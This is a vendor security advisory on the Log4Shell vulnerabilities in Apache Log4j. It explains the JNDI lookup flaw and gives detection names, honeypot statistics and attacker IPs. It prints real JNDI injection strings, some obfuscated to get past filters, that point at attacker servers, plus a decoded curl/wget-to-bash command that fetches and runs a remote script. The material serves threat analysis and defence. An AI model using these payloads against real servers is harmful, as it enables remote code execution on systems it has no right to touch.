CVE-2021-44228 vulnerability in Apache Log4j library

Updated 2021-12-20

CVE-2021-44228 and CVE-2021-45046 summary

A couple of weeks ago, information security media reported the discovery of the critical vulnerability CVE-2021-44228 in the Apache Log4j library (CVSS severity level 10 out of 10). The threat, also named Log4Shell or LogJam, is a Remote Code Execution (RCE) class vulnerability. If an attacker manages to exploit it on a vulnerable server, they gain the ability to execute arbitrary code and potentially take full control of the system. A publicly available proof of concept, together with the ease of exploitation, makes this situation particularly dangerous.

Some time later, researchers reported another vulnerability, assigned CVE-2021-45046. Initial reports said that it could cause Denial of Service (DoS) and that only specific non-default configurations were vulnerable, so its severity was set to the low value of 3.7 points. However, a little later it was raised to 9.0 because in some cases attacks based on this vulnerability can lead to remote code execution (RCE).

Kaspersky is aware of PoCs in the public domain and of the possible exploitation of CVE-2021-44228 and CVE-2021-45046 by cybercriminals. Our products protect against attacks leveraging both vulnerabilities, including PoC usage. Possible detection names are:

  • UMIDS:Intrusion.Generic.CVE-2021-45046.*
  • UMIDS:Intrusion.Generic.CVE-2021-44228.*
  • PDM:Exploit.Win32.Generic

KATA verdicts:

  • Exploit.CVE-2021-44228.TCP.C&C
  • Exploit.CVE-2021-44228.HTTP.C&C
  • Exploit.CVE-2021-44228.UDP.C&C

Geography of CVE-2021-44228 and CVE-2021-45046 scan and exploitation attempts, December 2021

CVE-2021-44228 and CVE-2021-45046 technical details

The remote code execution vulnerability CVE-2021-44228 was found in the Apache Log4j library, a part of the Apache Logging Project. If a product uses a vulnerable version of this library with the JNDI module for logging purposes, there is a high probability that this vulnerability can be exploited. Almost all versions of Log4j are vulnerable, from 2.0-beta9 to 2.14.1.
Log4j includes a Lookup mechanism that can be used to make requests through a special syntax in a format string. For example, it can be used to retrieve various parameters, such as the version of the Java environment via ${java:version}. When the jndi key is specified in the string, the Lookup mechanism uses the JNDI API. By default, all requests are made using the prefix java:comp/env/; however, the authors implemented the option of using a custom prefix by means of a colon symbol in the key. This is where the vulnerability lies: if jndi:ldap:// is used as the key, the request goes to the specified LDAP server. Other communication protocols, such as LDAPS, DNS and RMI, can also be used.

Kaspersky has been monitoring telemetry related to exploitation of the CVE-2021-44228 vulnerability, successfully extracting the URLs used by the attackers. Noteworthy examples can be found below.
${jndi%3aldap%3a//0ky8rj5089x9qx7tq8djb3rpp.canarytokens[.]com/a}
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName:user:env}.c6340b92vtc00002scfggdpcz9eyyyyyd.interactsh[.]com}
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160[.]149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC80NS41Ni45Mi4yMjk6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNDUuNTYuOTIuMjI5OjgwKXxiYXNo}
${jndi:ldap://5819.u837r4g5oolsy8hudoz24c15nwtohd.burpcollaborator[.]net/a}
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//62.182.80.168:1389/pien3m}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:l}${lower:d}${lower:a}${lower:p}}://67.205.191.102:1389/koejir}}

Analysis of the URLs showed how the attackers tried to insert the payload into uncommon fields, such as the User-Agent header, the data field and the URI parameter. This is an example of an evasion technique aimed at bypassing the simple blocking measures applied by many companies to protect against this kind of attack.

The following excerpt shows an exploitation attempt as displayed in HTTP server logs.
45.155.205[.]233:53590 server:80 - [10/Dec/2021:13:25:10 +0000] "GET / HTTP/1.1" 200 1671 "-" "${jndi:ldap://45.155.205[.]233:12344/Basic/Command/Base64/[BASE64-code-removed]}"

The base64 string in the request above decodes to:
(curl -s 45.155.xxx.xxx:5874/server:80||wget -q -O- 45.155.xxx.xxx:5874/server:80)|bash
The code fetches a malicious script from 45.155.xxx.xxx and subsequently runs it using Bash.

Thus, an attacker-controlled remote server could return an object to a vulnerable server, potentially leading to arbitrary code execution on the system or to leakage of confidential data. All an attacker needs to do is send a specially crafted string through any mechanism that writes this string to a log file, so that it is handled by the Log4j library. This can be done with simple HTTP requests, for example ones sent through web forms, data fields, etc., or with any other kind of interaction that uses server-side logging.

CVE-2021-45046 is caused by a separate issue related to the Thread Context functionality. It allows a programmer to assign values to multiple attributes at once and then substitute them into messages using a special syntax. If a product uses a non-default Pattern Layout with a Context Lookup, for example ${ctx:username}, then an attacker who controls this username value can trigger a recursive lookup that leads to a stack overflow error and causes a Denial of Service (DoS). In other situations, with certain specific configurations, it may even lead to remote code execution (RCE). Unfortunately, the mitigations related to formatMsgNoLookups and noFormatMsgLookup that were introduced to fix the previous vulnerability do not prevent this new one.

CVE-2021-44228 exploitation statistics

Data originating from our honeypots shows a total of 8646 exploitation attempts between December 10th and December 12th, with peak activity occurring on December 11th at 12:00 GMT at an hourly rate of 1700 malicious requests.

log4j exploitation attempts per hour, December 10th through 12th

Below are the top 10 most active attacker IPs we have observed so far.

| Source IP | Country | Total number of requests |
|---|---|---|
| 147.182.131[.]229 | USA | 948 |
| 147.182.215[.]36 | USA | 789 |
| 137.184.28[.]58 | USA | 693 |
| 195.54.160[.]149 | Russia | 201 |
| 45.155.205[.]233 | Germany | 182 |
| 5.157.38[.]50 | Sweden | 134 |
| 46.105.95[.]220 | France | 108 |
| 131.100.148[.]7 | Brazil | 104 |
| 113.141.64[.]14 | China | 103 |
| 221.228.87[.]37 | China | 83 |

We observed malicious requests coming to our honeypots from across the globe, with the most requests being made from the countries in the table below.

| Country | Total number of requests |
|---|---|
| United States | 1284 |
| China | 623 |
| Germany | 602 |
| United Kingdom | 497 |
| Canada | 477 |
| Netherlands | 476 |
| Singapore | 449 |
| France | 420 |
| Australia | 403 |
| Japan | 372 |

The systems most affected by mass scanning activity and attempts to leverage the exploit code were as follows.

| ASN | Total number of requests |
|---|---|
| DIGITALOCEAN-ASN | 1612 |
| M247 Ltd | 1190 |
| OOO Network of data-centers Selectel | 833 |
| GOOGLE | 736 |
| Host Universal Pty Ltd | 547 |
| Gigabit Hosting Sdn Bhd | 316 |
| Hydra Communications Ltd | 247 |
| Event Zero | 239 |
| PERFORMIVE | 228 |
| Intertelecom Ltd | 196 |

Mitigations for CVE-2021-44228 and CVE-2021-45046

Affected Kaspersky products

Supported Kaspersky products are not affected by the CVE-2021-44228 or CVE-2021-45046 vulnerabilities.

Indicators of compromise (IOC)



  1. Evans

    Very informative. Thank you.

  2. 0x0

    Thanks for the share, this is good and very detailed, keep it up.

  3. Elamparithi P

    When will the fix be available? If any fix comes out, please let us know soon.
